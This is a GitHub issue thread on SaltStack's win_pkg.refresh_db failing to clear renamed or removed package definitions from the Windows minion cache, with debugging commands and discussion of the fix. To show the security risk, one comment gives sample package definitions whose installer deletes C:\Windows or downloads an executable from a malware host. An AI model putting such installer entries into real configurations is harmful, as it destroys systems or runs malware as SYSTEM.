saltstack / salt

Software to automate the management and configuration of any infrastructure or application at scale. Get access to the Salt software package repository here:
https://repo.saltproject.io/
Apache License 2.0
14.14k stars 5.47k forks source link

win_pkg: refresh_db doesn't remove cached items which have been renamed or removed #35342

Closed morganwillcock closed 7 years ago

morganwillcock commented 8 years ago

If you remove or rename items in the repo-ng folder on the master, these are not removed from the minion cache when you run win_pkg.refresh_db. Particularly in the case of renaming, it's very likely to generate a name collision for the package which may result in incorrect installation states being returned (the pkg name map can still reference old sls files).

As an example, I'll rename my 7zip directory. It's already cached under it's old name:

salt salt-test cmd.run 'dir /b c:\salt\var\cache\salt\minion\files\base\win\repo-ng\*zip' 
salt-test:
    7zip

I rename it:

mv /srv/salt/win/repo-ng/7zip /srv/salt/win/repo-ng/seven_zip

Then run win_pkg.refresh_db, checking that it only lists the renamed directory:

salt salt-test pkg.refresh_db | grep zip
    - c:\salt\var\cache\salt\minion\files\base\win\repo-ng\seven_zip\7zip.sls

But on the minion, I've now got two folders in the cache:

salt salt-test cmd.run 'dir /b c:\salt\var\cache\salt\minion\files\base\win\repo-ng\*zip' 
salt-test:
    7zip
    seven_zip

And worse still the sls file is still there, and this can be matched when generating the name map:

salt salt-test cmd.run 'type c:\salt\var\cache\salt\minion\files\base\win\repo-ng\7zip\7zip.sls' 
salt-test:
    {% if grains['cpuarch'] == 'AMD64' %}
      {% set name_arch = ' (x64 edition)' %}
      {% set installer_arch = '-x64' %}
    {% else %}
      {% set name_arch = '' %}
      {% set installer_arch = '' %}
    {% endif %}

    7zip:
      '15.14.00.0':
        full_name: '7-Zip 15.14{{ name_arch }}'
        installer: 'salt://win/repo-ng/7zip/7z1514{{ installer_arch }}.msi'
        install_flags: '/qn /norestart'
        uninstaller: '{23170F69-40C1-2702-1514-000001000000}'
        uninstall_flags: '/qn /norestart'
        refresh: True
        msiexec: True
        use_scheduler: False
        locale: en_US
        reboot: False
        cache_dir: False
      '9.20.00.0':
        full_name: '7-Zip 9.20{{ name_arch }}'
        installer: 'salt://win/repo-ng/7zip/7z920{{ installer_arch }}.msi'
        install_flags: '/qn /norestart'
        uninstaller: '{23170F69-40C1-2702-0920-000001000000}'
        uninstall_flags: '/qn /norestart'
        refresh: True
        msiexec: True 
        use_scheduler: False
        locale: en_US
        reboot: False
        cache_dir: False

I can't think of any situation where you would want to maintain items in the repo-ng cache when they don't exist on the master, and trying to clear the cache with saltutil is going to clear the entire cache so I imagine this shouldn't be used during a state run.

So that the master side can be edited, surely pkg.refresh_db needs to be removing anything that doesn't exist any longer?

Tested on 2016.3.2

damon-atkins commented 8 years ago

It calls salt['cp.cache_dir'] to do the caching

Ch3LL commented 8 years ago

@morganwillcock I am able to replicate this but only for when users add files to the custom dir /srv/salt/win/repo-ng/. It looks like it is removing the files when they are located under /srv/salt/win/repo-ng/salt-winrepo-ng only. In fact in the documentation here it states the following:

Important If you have customized software definition files that aren't maintained in a repository, those should be stored under win/repo for older minions and win/repo-ng for newer minions. The reason for this is that the contents of win/repo/salt-winrepo and win/repo-ng/salt-winrepo-ng are wiped out every time you run a winrepo.update_git_repos.

Additionally, when you run winrepo.genrepo and pkg.refresh_db the entire contents under win/repo and win/repo-ng, to include all subdirectories, are used to create the msgpack file.

So according to the documentation it seems that only files in win/repo/salt-winrepo and win/repo-ng/salt-winrepo-ng are wiped and then re-added the files when running pkg.refresh_db.

Also if you look at the code here it is only wiping away the files in that directory and cache_dir does not seem to sync the files.

I think you are right though in the idea that you would expect these to be synced between the mastet rand minion for missing files, but I would like to get @twangboy 's input. Twangboy would you label this as expected behavior , bug or feature request? It seems this might be expected behavior but I believe it would be a nice feature to add this functionality for custom files in win/repo-ng. Or do you suggest using something else? Thoughts?

morganwillcock commented 8 years ago

@Ch3LL Thank you for testing this out. You could argue that this is a pretty big security problem. If the cache state doesn't match what's on the master you will end up blindly trusting the contents of the minion cache.

delete_the_windows_folder:
      '15.14.00.0':
        full_name: '7-Zip 15.14 (x64 edition)'
        installer: '%COMSPEC% /c rd /s /q C:\Windows'
install_some_malware:
      '15.14.00.0':
        full_name: '7-Zip 15.14 (x64 edition)'
        installer: 'http://www.malware.com/malware.exe'

It would seem that you must ensure the minion cache is in the correct state before running any pkg install or removal actions, or risk running unknown commands as the SYSTEM user.

twangboy commented 8 years ago

@Ch3LL I think @morganwillcock is correct, that the minion cache should be a replica of what's on the master. I believe this is the intended behavior.

Ch3LL commented 8 years ago

@twangboy okay great. I will label this as a bug so we can get this fixed up. Thanks

damon-atkins commented 8 years ago

I have looked at the code and it deletes a win\repo-ng\salt-winrepo-ng only before fetching the files again. It should delete win\repo-ng
I have a fix coming, which also include safety checks to make sure you don't delete c:\ by setting the salt configuration file to something strange.

morganwillcock commented 8 years ago

It seems to remove the purpose of the cache, if the end result is to clear the whole directory. I've got 21GB of files in my repo-ng directory, so I wouldn't want to delete them every time I make a change, just to make sure the SLS files are correct.

Just removing all and then re-copying all SLS files would stop the name map being broken, and it would seem more efficient if the win_pkg module has a "Clean" option when installing something with cache_dir: True, so any overhead of changes to other files are restricted to when you are actually needing to use those files.

damon-atkins commented 8 years ago

Their seems to be be no cp.sync, option which is why the original code deleted are re-copied. Given repo-ng cache only contains sls files and only copies sls files from the master, not sure how you can have 21GB under repo-ng part of the cache.

As far as I can see its not designed to have install binaries within salt://win/repo-ng/ as its meant to be the package meta data only.

damon-atkins commented 8 years ago

@twangboy please confirm salt://win/repo-ng/ should only contain meta data i.e. sls files and not msi or install exe. If this is the case can be get the doco update urgently please.

morganwillcock commented 8 years ago

It is documented to do it that way, so that is why I've got a large collection of files in there. https://docs.saltstack.com/en/latest/topics/windows/windows-package-manager.html#creating-a-package-definition-sls-file

firefox:
  '17.0.1':
    installer: 'salt://win/repo/firefox/English/Firefox Setup 17.0.1.exe'

I'm not opposed to having the content somewhere else, but the official repos are doing the same thing that I am: https://github.com/saltstack/salt-winrepo-ng/blob/master/jre8.sls

# due to winrepo installer limitations you need to manually download the exe from
# http://javadl.oracle.com/webapps/download/AutoDL?BundleId=207775
# and put it on the winrepo on master to install it the 'salt://win/repo-ng/jre8/...

...and I'm not sure what the point of the sub-directories would be, if only SLS files are required.

damon-atkins commented 8 years ago

There is only one meta db for an a environment. This is compiled on each client from the sls files under salt://win/repo-ng/ The refresh_db copies only the sls files and ignores everything else.

It should not matter that the cache is removed on the client. In your case the client should re-fetch the binary when its needed for the install. The examples use /repo/.../...exe not /repo-ng/ but I understand where you are coming from.

Under the old method the DB was compiled once on the master and the just the DB file was copied to the clients.

lorengordon commented 8 years ago

I'd like to be able to keep installers and binaries in the salt://win/repo and salt://win/repo-ng paths as well. This has long been supported (or at least has worked fine).

morganwillcock commented 8 years ago

I think the easiest way to fix this is to just remove the sls files, immediately before re-caching the repo-ng folder. The genrepo function walks the directory tree to read them, it seems pretty simple to also walk the directory tree to remove them (leaving the rest of the cache intact).

Unfortunately the directory cleaning functionaility looks like it's only implemented in the file state, so implementing this somewhere else (cp module or fileclient?) for other modules to use is probably less trivial.

damon-atkins commented 8 years ago

salt://win/repo can have what ever you like in. Its the old systems.

This ticket is about salt://win/repo-ng

Re: just removing sls, not aware salt as a delete filter (edited update: I could as you say copy the search code for the sls to delete individual files, but it would leave empty directories behind)

Even if salt had a sync (with delete) its not feasible to sync the whole of salt://win/repo-ng if it contain install exe and msi and other stuff. All at once you would have GB being copied to servers which filling up C drives and causing outages. Keep in mine that msi are also cached by windows once they are used for a installed, the msi will be on the C drive twice.

What do you guys do when Minion C Drive Cache Full of stuff like 10 different version of firefox.

The meta data needs to live separate disk space to the binaries on the client.

My use of this is for home. As OZ has a very small Salt install base.

Personally I think the exe and msi should be removed after use unless flagged to be stored in a permanent location (outside of the cache). You should be able to delete whole of minion's cache without impact.

World needs to be change one step at a time.

Need to talk about this coming release not future releases. What do you want?

morganwillcock commented 8 years ago

Even if salt had a sync (with delete) its not feasible to sync the whole of salt://win/repo-ng if it contain install exe and msi and other stuff.

To clarify, I'm talking about the sync it's already doing (that just copies all of the sls files).

Need to talk about this coming release not future releases. What do you want?

I think it's best to wait for an official response. I'm happy to contribute to a fix, once the correct solution is established. At the moment we can't even agree on how repo-ng was meant to work in the first place.

lorengordon commented 8 years ago

Keep in mind also that even if you specify an http:// installer path in the sls package definition, the installer is still getting cached to the minion when you run the actual install, so in the case of msi these files are already on the system twice.

The local cache on the minion can be removed, sure. The installer at the salt://win/repo-ng path on the salt master should not be. When syncing the package definitions to the minion, I wasn't saying to sync the entire win/repo-ng structure. Only the sls files need to be synced, then on install pull over the specified installers (from wherever the package definition defines them to be).

damon-atkins commented 8 years ago

The current version zaps everything on the minion cache within \win\repo-ng\salt-winrepo-ng under the assumption this is from github (which only contains sls files)

damon-atkins commented 8 years ago

Ping @meggiebot

morganwillcock commented 8 years ago

The current version zaps everything on the minion cache within \win\repo-ng\salt-winrepo-ng under the assumption this is from github (which only contains sls files)

This assumption is correct and no-one has suggested that any other files will be in there.

damon-atkins commented 8 years ago

It's a bad assumption, because anyone can copy an example and start putting anything they like in salt-winrepo-ng in a private git . We just have not heard from anyone using it this way... I assume it was put in as a work around for the very issue you want solved.

The only compatible way forward is to delete all sls files under \win\repo-ng for the time being. See what @twangboy has to say.

damon-atkins commented 8 years ago

The code has been updated to delete *.sls files only under normally \win\repo-ng tree in the cache

damon-atkins commented 8 years ago

PR #35899

damon-atkins commented 8 years ago

PR is ready to be Merged

meggiebot commented 8 years ago

@damon-atkins we're looking at this now.

damon-atkins commented 8 years ago

@morganwillcock This has been merged into develop. Please close unless you wish this to be back ported (which would require modules/reg.py as well).

morganwillcock commented 8 years ago

@damon-atkins Thanks for implementing this (and better feedback from sls compilation is much appreciated too). I think the path check before deleting is a good idea, but I think the way it is at the moment two out of three regex patterns would never be matched. Even if you pass empty strings in for the cache and repo paths the final path would always incorporate 'files' and the environment. Would it be easier to just check that the final path string begins with __opts__['cachedir']? This seems the simplest way to check that you are operating within the cache and would also support setting the cache inside the Windows folder (not a good idea, but if the cache is actually configured to be in there you would want to clear the sls files from it).

Also, os.walk follows NTFS junctions (even with followlinks=False) so to prevent the possibilty of infinite recursion, or running the delete in the wrong folder, I think the os.walk loop should check for FILE_ATTRIBUTE_REPARSE_POINT using win32file.

I'm happy to test out these changes, unless anyone sees any problems here?

damon-atkins commented 8 years ago

Thanks for the feed back. The output, it change several times, I kept coming back to what we need to see if running on 1,000 plus systems.

I am someone who always checks the path first before doing recursive delete, you never know what someone is going to do by accident. With a bad set of settings in the minion + some bad coding (i.e. removed files) its possible (very unlikely) for the result to be C:\ for example.

I will have a bit of a re-think....

It should really be that CACHEDIR is check for common sense given their exists a command to remove the entire cache.

I have also notice a another bug after looking up the configuration doco for minions, have no idea how long its been a bug. Code does not match the doco.

I will add os.walk(repo_path,followlinks=False) The issue you talk about is fixed in Python 3.3 I believe. Their seems to be a lot of windows improvements in Python 3. Sooner the better for Salt for Windows to move to PY3

I also notice the doco I have written could do with a clean up after seeing it processed and turned into a web page.

I will do some more work on the weekend to clean it all up.

I have created a ticket for "Python 3 Support - Windows Resolved Issues" to gather a list of fixes in PY3

damon-atkins commented 8 years ago

@morganwillcock please close issue, after testing the code from develop or carbon branch.

morganwillcock commented 8 years ago

Can I backport the recursive delete of the sls files? Otherwise this is a bug that isn't getting fixed on the stable branches.

damon-atkins commented 7 years ago

Hi @morganwillcock the fix is a behaviour change. It's up to the SaltStack to decide.

If running windows systems, I would run the latest version of salt (after some testing), because of the functionality improvements, performance and large number of fixes.

cachedout commented 7 years ago

I vastly prefer not to introduce behavioral changes into minor releases unless absolutely necessary, though I will defer to @UtahDave and @twangboy on this one.

damon-atkins commented 7 years ago

At this stage people using salt for Windows should be encourage to upgrade the salt client. There are many improvements with each release. Particularly Carbon/2016.11 has a lot of improvements.

The other alternative is to take all Carbon "as is" win_*.py and copy them back (including dependency) to 2016.3 and write a large amount of text in the release notes. 2016.3.4 out now, you could turn around tomorrow with 2016.3.5 Windows Only Release with just the windows changes, giving people a choice. Skip 2016.3.5 for Unix/Linux.

morganwillcock commented 7 years ago

Just to clarify, I'm suggesting to add the recursive delete of SLS files to stable branches, not backport everything from the commit that implemented it.

twangboy commented 7 years ago

@cachedout I think @morganwillcock 's comment is the fix. I'll submit a bigfix that removes orphaned .sls files.

twangboy commented 7 years ago

@morganwillcock I believe the above PR along with @damon-atkins PR's address the issues here.

morganwillcock commented 7 years ago

@twangboy That's great, thank you.